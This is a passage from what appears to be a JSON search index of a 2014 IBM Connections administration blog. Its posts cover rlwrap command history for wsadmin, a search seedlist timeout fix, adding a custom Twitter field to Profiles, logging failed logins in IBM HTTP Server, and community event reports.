la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n our session we made for Connect\n2014 and which is updated for IBM Connections 5 now.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n will be at 29th september to 1st\noctober in Gelsenkirchen. Admincamp is a great event with lots of\ntechnical content and no advertises, organized by\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Mitarbeiter\" target=\"_blank\"\u003eRudi Knegt and some more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI enjoy it very much to be again part of it, this year i will prepare\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Agenda\" target=\"_blank\"\u003ethree sessions \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n with\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-09-02-my-next-ics-events/","title":"My next ICS events"},{"body":"Missing command history on Linux is a little problem when using command line utilities like wsadmin, db2, sqlplus and so on.\nI found a solution for this today.\nYou can use rlwrap to get command history for all applications on the console and it is possible to recall and edit the commands. Rlwrap uses readline.\nInstallation on CentOS: yum install readline-static gcc make tar -xvzf rlwrap-0.41.tar.gz cd rlwrap-0.41 ./configure make make install Call rlwrap with wsadmin: rlwrap -r /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin/wsadmin.sh -lang jython -username wasadmin -password password rlwrap and db2 rlwrap -r db2 Use rlwrap everytime with alias vim ~/.bash_profile export WAS_HOME=/opt/IBM/WebSphere/AppServer export DMGR=Dmgr01 alias db2=\u0026#39;rlwrap -r db2\u0026#39; alias wsadmin=\u0026#39;cd $WAS_HOME/profiles/$DMGR/bin;rlwrap -r ./wsadmin.sh -lang jython\u0026#39; ","excerpt":"\u003cp\u003eMissing command history on Linux is a little problem when using command\nline utilities like wsadmin, db2, sqlplus and so on.\u003c/p\u003e\n\u003cp\u003eI found a \u003ca href=\"http://bereanstechnology.com/index.php?q=node/42\" target=\"_blank\"\u003esolution \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nthis today.\u003c/p\u003e\n\u003cp\u003eYou can use \u003ca href=\"http://utopia.knoware.nl/~hlub/uck/rlwrap/#rlwrap\" target=\"_blank\"\u003erlwrap \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n to\nget command history for all applications on the console and it is\npossible to recall and edit the commands. Rlwrap uses readline.\u003c/p\u003e\n\u003ch1 id=\"installation-on-centos\"\u003eInstallation on CentOS: \u003ca href=\"#installation-on-centos\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eyum install readline-static gcc make\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etar -xvzf rlwrap-0.41.tar.gz\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ecd\u003c/span\u003e rlwrap-0.41\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e./configure\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emake\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emake install\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"call-rlwrap-with-wsadmin\"\u003eCall rlwrap with wsadmin: \u003ca href=\"#call-rlwrap-with-wsadmin\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlwrap -r /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin/wsadmin.sh -lang jython -username wasadmin -password password\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"rlwrap-and-db2\"\u003erlwrap and db2 \u003ca href=\"#rlwrap-and-db2\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erlwrap -r db2\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"use-rlwrap-everytime-with-alias\"\u003eUse rlwrap everytime with alias \u003ca href=\"#use-rlwrap-everytime-with-alias\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003evim ~/.bash_profile\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003eexport\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eWAS_HOME\u003c/span\u003e=/opt/IBM/WebSphere/AppServer\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003eexport\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eDMGR\u003c/span\u003e=Dmgr01\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ealias\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003edb2\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#39;rlwrap -r db2\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#cb4b16\"\u003ealias\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003ewsadmin\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#39;cd $WAS_HOME/profiles/$DMGR/bin;rlwrap -r ./wsadmin.sh -lang jython\u0026#39;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2014/2014-07-31-command-history-wsadmin-on-linux/","title":"Command history wsadmin on Linux"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/prague/","title":"Prague"},{"body":"This week starts in the beautiful town Prague with Social Connections VI. I met great people and first of all i want to thank the organisation team for this great event.\nAt the end we made the traditional image with all attendees.\nFoto ©2014 by Oli Heinz I enjoyed two very delicious dinners and had great discussions around IBM ICS, met old and new friends. After years of tweets, forum entries and virtual talks i finally met Martin in person and had an entertaining evening with him and Sjaak .\nFoto ©2014 by Oli Heinz Big thanks to Oliver Heinz who made fantastic photos of prague, us and around the event . All pictures in this blog posts are made by him.\nMy session Script it! This time i made a session without support of Klaus or Sharon , but i was happy with the result and i hope that some attendees will help to get the IBMCNX Community scripts more complete.\nFoto ©2014 by Oli Heinz And for everyone the offer again, you see the different kinds of persistent Skype group chats, if you want to join, send me a short message.\nDuring this week we heared several announcements: IBM Connections 5 will ship on 26th of june Files Connector (Beta) for Mac is announced for IBM CNX 5 CR1\nnext Social Connections (VII) will be in Stockholm on 10th and 11th of November 2014\nI see forward to Social Connections VII and hope to meet lots of you there!\n","excerpt":"\u003cp\u003eThis week starts in the beautiful town\n\u003ca href=\"http://www.praguewelcome.cz/en/\" target=\"_blank\"\u003ePrague \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n with Social Connections VI. I\nmet great people and first of all i want to thank the\n\u003ca href=\"http://socialconnections.info/about/the-team/\" target=\"_blank\"\u003eorganisation team \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for\nthis great event.\u003c/p\u003e\n\u003cp\u003eAt the end we made the traditional image with all attendees.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/06/14474080153_48345ce2b9_b.jpg\" alt=\"14474080153 48345ce2b9 b\" /\u003e\n\u003c/p\u003e\n\n\nFoto ©2014 by \u003ca href=\"http://twitter.com/oliheinz\" target=\"_blank\"\u003eOli Heinz \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eI enjoyed two very delicious dinners and had great discussions around\nIBM ICS, met old and new friends. After years of tweets, forum entries\nand virtual talks i finally met \u003ca href=\"http://martin.leyrer.priv.at/\" target=\"_blank\"\u003eMartin \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\nperson and had an entertaining evening with him and\n\u003ca href=\"http://twitter.com/sursinus\" target=\"_blank\"\u003eSjaak \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2014/06/14452796814_e840d6561a_b.jpg\" alt=\"14452796814 e840d6561a b\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-06-19-social-connections-vi-in-prague/","title":"Social Connections VI in Prague"},{"body":"As preparation for Social Connections VI in Prague next week i redesigned the Administration Scripts for IBM Websphere .\nSome highlights:\nall scripts are moved to a subfolder with DMGR/bin (folder name: ibmcnx)\ntested in multinode environments\nadded some classes everybody can use for his own scripts\nadding policies to libraries (personal and communities) are using search now\nNew scripts:\ndocumentation of all jvm settings of each application server\ncreate a file with all documentation in one step\ncreate cluster members for additional nodes\nSharon created a document with the content of all of our presentations and collected several tipps all around connections and community scripts. She will share this next time. We started to share parts of this document and more documentations (installation, usage) for scripts and IBM Connections on:\nScripting101.org The new version can be downloaded from:\nOpenNTF GitHub ","excerpt":"\u003cp\u003eAs preparation for\n\u003ca href=\"http://socialconnections.info/events/social-connections-vi/\" target=\"_blank\"\u003eSocial\nConnections VI in Prague \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n next week i redesigned the\n\u003ca href=\"http://openntf.org/main.nsf/project.xsp?r=project/Administration%20Scripts%20for%20WebSphere/releases/C06D87632050DDCC86257CF5004E18A7\" target=\"_blank\"\u003eAdministration Scripts for IBM Websphere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eSome highlights:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eall scripts are moved to a subfolder with DMGR/bin (folder name:\nibmcnx)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003etested in multinode environments\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eadded some classes everybody can use for his own scripts\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eadding policies to libraries (personal and communities) are using\nsearch now\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eNew scripts:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003edocumentation of all jvm settings of each application server\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ecreate a file with all documentation in one step\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ecreate cluster members for additional nodes\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eSharon created a document with the content of all of our presentations\nand collected several tipps all around connections and community\nscripts. She will share this next time. We started to share parts of\nthis document and more documentations (installation, usage) for scripts\nand IBM Connections on:\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-06-14-new-version-of-administration-scripts-for-websphere/","title":"New version of “Administration Scripts for WebSphere”"},{"body":"IBM released a tech document on friday with title: Search fails with the error CLFRW0060E: Input-output exception .\nThis document solves one of my problems i had in a demo environment since two weeks. I traced the environment, checked j2ee roles, reinstalled CR3 and 4, redeployed search and activities, but i always got an error, when the search wants to access the activities seed list.\nSo what happened? I want to show the /search/serverStatus page in a course and for this i want to remove all warnings and errors. When you don’t set SEARCH_SEEDLIST_TIMEOUT, you get a warning, that the variable is not set.\nSo i had set this to 150 and checked the serverStatus page and all was green. So i thought everything is ok and didn’t check the documentation to this. After some hours the search was broken, with the error mentioned above. When i checked the Seedlist URL with the browser everything was ok, when the search wants to access it i got the Input-output exception.\nWhen you read the tech document, you see that SEARCH_SEEDLIST_TIMEOUT is needed in miliseconds! So i had set it to 0.15 seconds and this is too less for activities, all other applications were ok. After reading the document i remembered setting this value and increased it to 15000 and voila the search builds perfectly and all errors are gone.\nI learned again that i should read the documentation and that search/serverStatus does not validate the variables, it only checks that that the variable is present. Maybe this should be made as a feature request?\nIn the trace you see login data and that search can’t access the url, but not that the request timed out.\n","excerpt":"\u003cp\u003eIBM released a tech document on friday with title:\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21672340\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003eSearch\nfails with the error CLFRW0060E: Input-output exception \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThis document solves one of my problems i had in a demo environment\nsince two weeks. I traced the environment, checked j2ee roles,\nreinstalled CR3 and 4, redeployed search and activities, but i always\ngot an error, when the search wants to access the activities seed list.\u003c/p\u003e\n\u003cp\u003eSo what happened? I want to show the /search/serverStatus page in a\ncourse and for this i want to remove all warnings and errors. When you\ndon’t set SEARCH_SEEDLIST_TIMEOUT, you get a warning, that the variable\nis not set.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-05-11-search-fails-with-the-error-clfrw0060e-input-output-exception/","title":"Search fails with the error CLFRW0060E: Input-output exception"},{"body":"Adding a custom field to IBM Connections Profiles is great documented in “https://www.slideshare.net/palmke/show301-make-your-ibm-connections-deployment-your-own-customize-it-30628456[SHOW301: Make Your IBM® Connections Deployment Your Own: Customize It!]” the Connect 2014 session of Wannes Rams and Klaus Bild . Thanks to them for this great collection of customizing tipps.\nIn my case the bundle name is “stoeps” and the custom field i want to add is “twitterId”.\nlotusconnections-config.xml \u0026lt;resources\u0026gt; \u0026lt;!-- Custom strings for field labels --\u0026gt; \u0026lt;widgetBundle name=\u0026#34;local.stoeps.profiles.strings.uiLabels\u0026#34; prefix=\u0026#34;stoeps\u0026#34;/\u0026gt; \u0026lt;/resources\u0026gt; local.stoeps.profiles.strings.uilabels.properties # extension property field labels label.stoeps.twitterId=Twitter Id: profiles-types.xml \u0026lt;property\u0026gt; \u0026lt;!-- Custom field for Twitter ID --\u0026gt; \u0026lt;ref\u0026gt;twitterId\u0026lt;/ref\u0026gt; \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt; \u0026lt;hidden\u0026gt;false\u0026lt;/hidden\u0026gt; \u0026lt;/property\u0026gt; profiles-config.xml Checkout profiles-config.xml and change following points:\n\u0026lt;profileDataModels\u0026gt; \u0026lt;profileExtensionAttributes\u0026gt; ... \u0026lt;simpleAttribute extensionId=\u0026#34;twitterId\u0026#34; length=\u0026#34;180 /\u0026gt; \u0026lt;/profileExtensionAttributes\u0026gt; \u0026lt;/profileDataModels\u0026gt; Uncomment the extensions templateData:\n\u0026lt;template name=\u0026#34;businessCardInfo\u0026#34;\u0026gt; \u0026lt;templateDataModel\u0026gt; \u0026lt;!-- include if you render workLocation, organization, department information --\u0026gt; \u0026lt;templateData\u0026gt;codes\u0026lt;/templateData\u0026gt; \u0026lt;!-- include if any only if you render profile extension fields in the template --\u0026gt; \u0026lt;templateData\u0026gt;extensions\u0026lt;/templateData\u0026gt;\u0026lt;!-- activated for twitterId in searchResult --\u0026gt; \u0026lt;!-- include if you render secretary name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;secretary\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render manager name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;manager\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render information dependent upon two users being connected --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;connection\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;/templateDataModel\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;template name=\u0026#34;searchResults\u0026#34;\u0026gt; \u0026lt;templateDataModel\u0026gt; \u0026lt;!-- include if you render workLocation, organization, department information --\u0026gt; \u0026lt;templateData\u0026gt;codes\u0026lt;/templateData\u0026gt; \u0026lt;!-- include if any only if you render profile extension fields in the template --\u0026gt; \u0026lt;templateData\u0026gt;extensions\u0026lt;/templateData\u0026gt;\u0026lt;!-- activated for twitterId in searchResult --\u0026gt; \u0026lt;!-- include if you render secretary name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;secretary\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;!-- include if you render manager name or email in the template --\u0026gt; \u0026lt;!-- \u0026lt;templateData\u0026gt;manager\u0026lt;/templateData\u0026gt; --\u0026gt; \u0026lt;/templateDataModel\u0026gt; \u0026lt;/template\u0026gt; ... \u0026lt;searchLayout\u0026gt; ... \u0026lt;!-- custom field in searchResult --\u0026gt; \u0026lt;extensionAttribute showLabel=\u0026#34;false\u0026#34; labelKey=\u0026#34;label.stoeps.twitterId\u0026#34; bundleIdRef=\u0026#34;stoeps\u0026#34; extensionIdRef=\u0026#34;twitterId\u0026#34;/\u0026gt; \u0026lt;/searchLayout\u0026gt; Now you must add following line to :\nprofilesEdit.ftl I added following line within \u0026lt;@util.renderSection sectionLabel=”contactInformation”\u0026gt;:\n\u0026lt;@util.renderFormControl ref=\u0026#34;twitterId\u0026#34; singleColumnLayout=false nlsBundle=\u0026#34;stoeps\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34;/\u0026gt; profilesDetails.ftl \u0026lt;#-- Customize start --\u0026gt; \u0026lt;#-- Adding a field twitter id --\u0026gt; \u0026lt;@util.renderProperty ref=\u0026#34;twitterId\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34; nlsBundle=\u0026#34;stoeps\u0026#34; hideIfEmpty=true ; ref, dataId, dataKey, nlsKey, nlsBundle\u0026gt; \u0026lt;@util.renderValue ref=ref renderAs=\u0026#34;twitter\u0026#34; /\u0026gt; \u0026lt;br/\u0026gt; \u0026lt;/@util.renderProperty\u0026gt; \u0026lt;#– Customize end –\u0026gt;\nsearchResults.ftl I added following code above the renderProperty of jobResp:\n\u0026lt;@util.renderProperty ref=\u0026#34;twitterId\u0026#34; nlsKey=\u0026#34;label.stoeps.twitterId\u0026#34; nlsBundle=\u0026#34;stoeps\u0026#34; hideIfEmpty=true ; ref, dataId, dataKey, nlsKey, nlsBundle\u0026gt; \u0026lt;div\u0026gt; \u0026lt;@util.renderValue ref=ref renderAs=\u0026#34;twitter\u0026#34;/\u0026gt; \u0026lt;/strong\u0026gt; \u0026lt;/div\u0026gt; \u0026lt;/@util.renderProperty\u0026gt; renderAs comes from commonUtil.ftl, to format a URL to the Twitter Homepage.\ncommonUtil.ftl ... \u0026lt;#elseif renderAs = \u0026#34;email\u0026#34;\u0026gt; \u0026lt;a href=\u0026#34;ma\u0026amp;#105;l\u0026amp;#116;\u0026amp;#111;\u0026amp;#58;\u0026amp;#36;\u0026amp;#123;\u0026amp;#118;\u0026amp;#97;lue\u0026amp;#125;\u0026#34;\u0026gt;${value}\u0026lt;/a\u0026gt; \u0026lt;#-- customize start --\u0026gt; \u0026lt;#elseif renderAs = \u0026#34;twitter\u0026#34;\u0026gt; \u0026lt;#-- special rendering for twitter id --\u0026gt; \u0026lt;a href=\u0026#34;http://twitter.com/${value}\u0026#34; target=\u0026#34;_new\u0026#34;\u0026gt;@${value}\u0026lt;/a\u0026gt; \u0026lt;#-- customize end --\u0026gt; \u0026lt;#elseif renderAs = \u0026#34;blogUrl\u0026#34;\u0026gt; ... Result: search result Profile ","excerpt":"\u003cp\u003eAdding a custom field to IBM Connections Profiles is great documented in\n“https://www.slideshare.net/palmke/show301-make-your-ibm-connections-deployment-your-own-customize-it-30628456[SHOW301:\nMake Your IBM® Connections Deployment Your Own: Customize It!]” the\n\u003ca href=\"http://www-01.ibm.com/software/collaboration/events/connect/\" target=\"_blank\"\u003eConnect\n2014 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n session of \u003ca href=\"http://wannesrams.wordpress.com\" target=\"_blank\"\u003eWannes Rams \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Thanks to them for this great collection of\ncustomizing tipps.\u003c/p\u003e\n\u003cp\u003eIn my case the bundle name is “stoeps” and the custom field i want to\nadd is “twitterId”.\u003c/p\u003e\n\u003ch1 id=\"lotusconnections-configxml\"\u003elotusconnections-config.xml \u003ca href=\"#lotusconnections-configxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;resources\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;!-- Custom strings \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e field labels --\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;widgetBundle \u003cspan style=\"color:#268bd2\"\u003ename\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;local.stoeps.profiles.strings.uiLabels\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eprefix\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;stoeps\u0026#34;\u003c/span\u003e/\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/resources\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"localstoepsprofilesstringsuilabelsproperties\"\u003elocal.stoeps.profiles.strings.uilabels.properties \u003ca href=\"#localstoepsprofilesstringsuilabelsproperties\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#93a1a1;font-style:italic\"\u003e# extension property field labels\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003elabel.stoeps.twitterId=Twitter Id:\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"profiles-typesxml\"\u003eprofiles-types.xml \u003ca href=\"#profiles-typesxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;property\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;!-- Custom field \u003cspan style=\"color:#859900\"\u003efor\u003c/span\u003e Twitter ID --\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;ref\u0026gt;twitterId\u0026lt;/ref\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;updatability\u0026gt;readwrite\u0026lt;/updatability\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;hidden\u0026gt;false\u0026lt;/hidden\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/property\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch1 id=\"profiles-configxml\"\u003eprofiles-config.xml \u003ca href=\"#profiles-configxml\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eCheckout profiles-config.xml and change following points:\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-15-customizing-ibm-connections-profiles-add-custom-field-to-searchresults/","title":"Customizing IBM Connections Profiles – Add custom field to searchResults"},{"body":"You can log login errors within IBM Http Server.\nOne way would be to get use SetEnvIf, but then you can’t get the querystring of the error page. When you type a wrong password the URL changes from https://connectionshost/application/login/ to https://connectionshost/application/login/?error=true.\nSetEnvIf Request_URI \u0026#34;/login$\u0026#34; log This set the environment variable to log, but when you read the Apache documentation you find:\nThe resource requested on the HTTP request line — generally the portion of the URL following the scheme and host portion without the query string. See the RewriteCond directive of mod_rewrite for extra information on how to match your query string\nSo we need a way to get ?error=true, with mod_rewrite we can access the query_string:\nLoadModule rewrite_module modules/mod_rewrite.so RewriteCond %{QUERY_STRING} \u0026#34;error=true\u0026#34; RewriteRule (.*) $1 [E=log:yes] CustomLog \u0026#34;D:/IBM/HTTPServer/logs/loginpage.log\u0026#34; combined env=log Now we can access the login page, type a wrong password and check the log:\n192.168.110.190 - - [15/Apr/2014:10:40:15 +0200] \u0026#34;GET /homepage/login/?error=true HTTP/1.1\u0026#34; 200 2763 \u0026#34;https://cnxwin.stoeps.local/homepage/login/?error=true\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; 192.168.110.190 - - [15/Apr/2014:11:00:49 +0200] \u0026#34;GET /communities/login?error=true HTTP/1.1\u0026#34; 200 2766 \u0026#34;https://cnxwin.stoeps.local/communities/login\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; 192.168.110.190 - - [15/Apr/2014:11:00:56 +0200] \u0026#34;GET /blogs/login?error=true\u0026amp;lang=en_us HTTP/1.1\u0026#34; 200 2763 \u0026#34;-\u0026#34; \u0026#34;Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0\u0026#34; ","excerpt":"\u003cp\u003eYou can log login errors within IBM Http Server.\u003c/p\u003e\n\u003cp\u003eOne way would be to get use SetEnvIf, but then you can’t get the\nquerystring of the error page. When you type a wrong password the URL\nchanges from \u003ccode\u003ehttps://connectionshost/application/login/\u003c/code\u003e to\n\u003ccode\u003ehttps://connectionshost/application/login/?error=true\u003c/code\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSetEnvIf Request_URI 